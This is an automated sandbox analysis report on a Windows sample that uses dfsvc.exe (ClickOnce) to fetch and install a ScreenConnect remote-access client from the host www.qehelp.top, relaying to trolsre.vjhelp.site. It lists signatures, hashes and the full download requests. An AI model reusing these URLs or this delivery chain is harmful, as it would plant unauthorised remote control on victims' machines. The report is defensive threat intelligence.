Edit tour

Windows Analysis Report
SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Overview

General Information

Sample name:	SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe
Analysis ID:	1638476
MD5:	39631266cde107aafb4e947c5725dbac
SHA1:	484b5b3109c5cb3861909548bed2d7f0492572b5
SHA256:	721328fb869fd1bae2544be871e50ebb423cefba474a92b5939071f3cdb436d0
Tags:	exeuser-SecuriteInfoCom
Infos:

Detection

ScreenConnect Tool

Score:	45
Range:	0 - 100
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

.NET source code references suspicious native API functions

Contains functionality to hide user accounts

Detected potential unwanted application

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Detected potential crypto function

Drops PE files

Drops certificate files (DER)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

PE file contains an invalid checksum

PE file does not import any functions

PE file overlay found

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports

Stores large binary data to the registry

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected ScreenConnect Tool

Classification

Process Tree

System is w10x64

SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe (PID: 6636 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe" MD5: 39631266CDE107AAFB4E947C5725DBAC)

dfsvc.exe (PID: 6712 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: dfsvc.exe PID: 6712	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security

Sigma Signatures

System Summary

Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports

Source: Network Connection

Author: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49682, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 6712, Protocol: tcp, SourceIp: 104.21.48.1, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Virustotal: Detection: 16%			Perma Link
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Code function: 0_2_00F21000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,

0_2_00F21000

Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Static PE information: certificate valid

Source: unknown

HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49682 version: TLS 1.2

Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2775388417.000002AE8025E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE8060D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80701000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3630000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2775388417.000002AE806D5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80262000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80611000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: lib.pdb source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3771000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.pdb source: dfsvc.exe, 00000001.00000002.2778707559.000002AEF0608000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer322 source: dfsvc.exe, 00000001.00000002.2779624660.000002AEF1F70000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80609000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80548000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE8025A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE807DF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.Core.dll.1.dr

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Code function: 0_2_00F24B9B FindFirstFileExA,

0_2_00F24B9B

Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=trolsre.vjhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQDV6xFPf0gBDf2QlOVh5c6Tk56d4df2RxXNn1uOxVGhNGdttkYEP%2bQ09TDkFt%2boaP7I3GpltcCx97duxcvOFmR%2b5rjxPpj38aYagtSpx%2fmr%2fggkrYxVzh2Ub3ueGGvvMb6mUXqQCnYmk%2fUdLn9DLTUMT2UQyzY4yzsmT1pyHT%2bC6eum7vzmnvHYi2O4nABBhNCuGFMP7n6WRKSSDYq2Sq6ChgErUIKOOkmilUeWNzeQ3EEHx4BEZniwPH1Ovptzvaq%2fDqwIb40ArAot8M19Ov1q1ufJKCXo3XW2IxUzRsFajWF5ZO8ffHOFTGotiacp4LUh5tHFbALpyut0rCNh9qva&r=&i= HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=trolsre.vjhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQDV6xFPf0gBDf2QlOVh5c6Tk56d4df2RxXNn1uOxVGhNGdttkYEP%2bQ09TDkFt%2boaP7I3GpltcCx97duxcvOFmR%2b5rjxPpj38aYagtSpx%2fmr%2fggkrYxVzh2Ub3ueGGvvMb6mUXqQCnYmk%2fUdLn9DLTUMT2UQyzY4yzsmT1pyHT%2bC6eum7vzmnvHYi2O4nABBhNCuGFMP7n6WRKSSDYq2Sq6ChgErUIKOOkmilUeWNzeQ3EEHx4BEZniwPH1Ovptzvaq%2fDqwIb40ArAot8M19Ov1q1ufJKCXo3XW2IxUzRsFajWF5ZO8ffHOFTGotiacp4LUh5tHFbALpyut0rCNh9qva&r=&i= HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip

Source: global traffic

DNS traffic detected: DNS query: www.qehelp.top

Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80266000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80615000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCe
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, 00000000.00000002.1322014110.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, 00000000.00000003.1321585108.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTr
Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: F2E248BEDDBB2D85122423C41028BFD40.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, 00000000.00000002.1322014110.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, 00000000.00000003.1321585108.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootiR
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80625000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80277000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.d~
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF370D000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.1.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDatav=
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: dfsvc.exe, 00000001.00000002.2779033373.000002AEF0666000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl&
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE8001A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80090000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80090000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
Source: ScreenConnect.Core.dll.1.dr	String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE802DC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE807DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE804BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, 00000000.00000003.1321585108.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenCon
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80701000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.C
Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Client.application
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE804BC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application
Source: 9R0ZJ9SM.log.1.dr	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=trolsre.vjhelp.site&
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE802DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Client.dll
Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Client.dlltj9m
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE804BC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80090000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2779844547.000002AEF3667000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE802DC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE803EF000.00000004.00000800.00020000.00000000.sdmp, 9R0ZJ9SM.log.1.dr	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Client.manifest
Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Client.manifestE
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80548000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80701000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.ClientSer
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80701000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.ClientService.dll
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2779844547.000002AEF3667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.ClientService.exe
Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.ClientService.exed
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE807DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Core.dll
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Windo
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Windows.dll
Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Windows.dllJ
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsBackstageS
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE807DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsCl
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE807DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsClient.exe
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsClient.exe.config
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsFileMa
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsFileManager.ex8
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsFileManager.exe
Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config
Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsFileManager.exe.configU
